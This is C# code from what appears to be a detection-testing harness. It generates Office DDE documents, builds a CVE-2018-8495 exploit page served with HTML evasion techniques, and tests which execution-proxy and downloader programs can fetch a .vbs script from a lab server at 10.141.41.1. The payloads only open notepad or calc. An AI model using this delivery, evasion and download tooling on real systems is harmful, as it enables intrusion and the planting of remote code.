public static IEnumerable <Tonsil.Files.File> GetAllFilesRead(Tonsil.Processes.Process process, bool remoteOnly = true)
{
var filesRead = new List <Tonsil.Files.File>();
foreach (var file in process.FilesRead)
{
if (!remoteOnly || typeof(Tonsil.Files.RemoteFilePath).IsInstanceOfType(file.FilePath))
{
filesRead.Add(file);
}
}
foreach (var childProcess in process.ChildProcesses)
{
var files = GetAllFilesRead(childProcess);
foreach (var file in files)
{
if (!remoteOnly || typeof(Tonsil.Files.RemoteFilePath).IsInstanceOfType(file.FilePath))
{
filesRead.Add(file);
}
}
}
return(filesRead);
}
// Office DDE Example
private static IAttack OfficeDdeExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "OfficeDde";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
var cmdline = new Tonsil.Processes.CmdLine()
{
image = @"notepad", arguments = new string[] { }
};
var process = new Tonsil.Processes.Process(cmdline);
var processList = new ProcessList(new[] { process });
var wordDde = new WordDDE(processList);
var wordDdeFilename = "WordDDE" + "." + wordDde.Extension;
samplesOutput.Add(wordDdeFilename, wordDde);
var excelDde = new ExcelDDE(processList);
var excelDdeFilename = "ExcelDDE" + "." + excelDde.Extension;
samplesOutput.Add(excelDdeFilename, excelDde);
attack.Generate();
return(attack);
}
private static System.Diagnostics.Process[] GetProcesses(Tonsil.Processes.Process targetProcess)
{
Tonsil.Processes.CmdLine cmdline = targetProcess.CmdLine;
System.IO.FileInfo fi = new System.IO.FileInfo(cmdline.image);
string processName = fi.Name;
string friendlyName = System.IO.Path.GetFileNameWithoutExtension(processName);
System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcessesByName(friendlyName);
return(processes);
}
private static void KillProcesses(Tonsil.Processes.Process targetProcess)
{
System.Diagnostics.Process[] processes = GetProcesses(targetProcess);
foreach (var proc in processes)
{
try
{
proc.Kill();
}
catch
{
Console.WriteLine("Failed to kill process.");
}
}
}
// Kill targetProcess; Executes processUnderTest; checks if targetProcess is descendent of processUnderTest; kill targetProcess
public static bool TestExecutionProxy(Tonsil.Processes.Process processUnderTest, Tonsil.Processes.Process targetProcess)
{
KillProcesses(targetProcess);
System.Diagnostics.ProcessStartInfo si = new System.Diagnostics.ProcessStartInfo()
{
FileName = processUnderTest.CmdLine.image,
Arguments = string.Join(" ", processUnderTest.CmdLine.arguments),
RedirectStandardOutput = false,
RedirectStandardError = false,
RedirectStandardInput = false,
UseShellExecute = false,
WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
};
System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si);
//System.Threading.Thread.Sleep(2 * 1000);
rootProcess.WaitForExit(1000);
var processes = GetProcesses(targetProcess);
KillProcesses(targetProcess);
return(processes.Length > 0);
}
private static IAttack HtmlmthServerOutputExample()
{
// Note: This sample can't use HOSTNAME = HostnameB since port 80 on HostnameB is already occupied by the HTTP Server from Sample4
var HOSTNAME = "HostnameC1"; // the DNS name "HostnameC1" points to the virtual host "VirtualHostC"
var VIRTUALHOST = "VirtualHostC";
var HOST = Host.GetHostByHostName(HOSTNAME) ?? new Host(VIRTUALHOST, HOSTNAME, null);
var htmlmthServerOutput = new HtmlmthServerOutput(HOST); // the default port is 80
var attackName = "HtmlmthServerOutput";
var attack = new Attack(new IOutput[] {
htmlmthServerOutput,
}, name: attackName);
// This represents a commandline used to create a new process
var cmdline = new Tonsil.Processes.CmdLine()
{
image = @"calc", arguments = new string[] { }
};
var process = new Tonsil.Processes.Process(cmdline);
// List of commandlines
var processList = new ProcessList(new[] { process });
// Note: this exploit enforces a ProcessList size of size 1
var exploitWebsite = new CVE_2018_8495(processList);
// Network Evasions to apply to the delivery of the exploit
var exploitEvasions = new[] { // Refer to HTMLMTH documentation & source code for the available evasions
"htmlmth.evasions.html.entity_encoding_attributes_dec",
"htmlmth.evasions.html.external_resource_internal_script",
"htmlmth.evasions.html.insert_slash_after_opening_tag_names",
"htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be"
};
// HtmlmthWebsite represents the HTTP resource(s) hosted by HTMLMTH server
var exploitHtmlmthWebsite = new HtmlmthWebsite(exploitWebsite, HOST, exploitEvasions);
// Dont forget to bookkeep
htmlmthServerOutput.Add(exploitHtmlmthWebsite);
attack.Generate();
// The files needed to launch the HTMLMTH server should now be at $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server
return(attack);
}
public static bool TestDownloader(Tonsil.Processes.Process processUnderTest, Tonsil.Files.File sourceFile, Tonsil.Files.File destinationFile)
{
System.IO.File.Delete(destinationFile.FilePath.Path);
System.Diagnostics.ProcessStartInfo si = new System.Diagnostics.ProcessStartInfo()
{
FileName = processUnderTest.CmdLine.image,
Arguments = string.Join(" ", processUnderTest.CmdLine.arguments),
RedirectStandardOutput = false,
RedirectStandardError = false,
RedirectStandardInput = false,
UseShellExecute = false,
WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
};
System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si);
System.Threading.Thread.Sleep(2 * 1000);
rootProcess.WaitForExit(1000);
bool result = System.IO.File.Exists(destinationFile.FilePath.Path);
System.IO.File.Delete(destinationFile.FilePath.Path);
return(result);
}
public static Dictionary <string, bool> TestExecutionProxyDownloaders()
{
Dictionary <string, bool> results = new Dictionary <string, bool>();
string serverHost = "10.141.41.1";
Tonsil.Files.HttpFilePath httpFilePath = new Tonsil.Files.HttpFilePath()
{
Host = serverHost,
Port = 80,
Directory = "/somedir/",
Filename = "somefile.vbs"
};
Tonsil.Files.SmbFilePath smbFilePath = new Tonsil.Files.SmbFilePath()
{
Host = serverHost,
Port = 445,
ShareName = "someshare",
Directory = @"\somedir\",
Filename = "somefile.vbs"
};
Tonsil.Files.LocalFilePath localFilePath = new Tonsil.Files.LocalFilePath()
{
Directory = @"c:\",
Filename = "somefile.vbs"
};
List <Tonsil.Files.FilePath> filePaths = new List <Tonsil.Files.FilePath>()
{
httpFilePath, smbFilePath
};
Tonsil.Files.File destinationFile = new Tonsil.Files.File()
{
FileType = Tonsil.Files.FileType.VBScript,
FilePath = localFilePath
};
Type downloaderParentType = typeof(Tonsil.Processes.Downloaders.Downloader);
Assembly assembly = downloaderParentType.Assembly;
Type[] types = assembly.GetTypes();
IEnumerable <Type> downloaderSubclasses = types.Where(t => t.IsSubclassOf(downloaderParentType));
Type executionProxyParentType = typeof(Tonsil.Processes.ExecutionProxys.ExecutionProxy);
IEnumerable <Type> executionProxySubclasses = types.Where(t => t.IsSubclassOf(executionProxyParentType));
foreach (Type executionProxyType in executionProxySubclasses)
{
foreach (Type downloaderType in downloaderSubclasses)
{
foreach (var filePath in filePaths)
{
Tonsil.Files.File sourceFile = new Tonsil.Files.File()
{
FilePath = filePath
};
Tonsil.Processes.Downloaders.Downloader downloadProcessUnderTest = (Tonsil.Processes.Downloaders.Downloader)Activator.CreateInstance(downloaderType);
if (downloadProcessUnderTest.IsValidSource(sourceFile) && downloadProcessUnderTest.IsValidDestination(sourceFile, destinationFile))
{
downloadProcessUnderTest.AddDownload(sourceFile, destinationFile);
Tonsil.Processes.Process targetProcess = downloadProcessUnderTest;
Tonsil.Processes.ExecutionProxys.ExecutionProxy processUnderTest = (Tonsil.Processes.ExecutionProxys.ExecutionProxy)Activator.CreateInstance(executionProxyType);
processUnderTest.AddCmdlineExecution(targetProcess);
bool result = TestDownloader(processUnderTest, sourceFile, destinationFile);
Console.WriteLine(string.Format("{1}: \t{0}", processUnderTest.CmdLine.ToString(), result ? "Pass" : "Fail"));
results.Add(processUnderTest.CmdLine.ToString(), result);
}
}
}
}
return(results);
}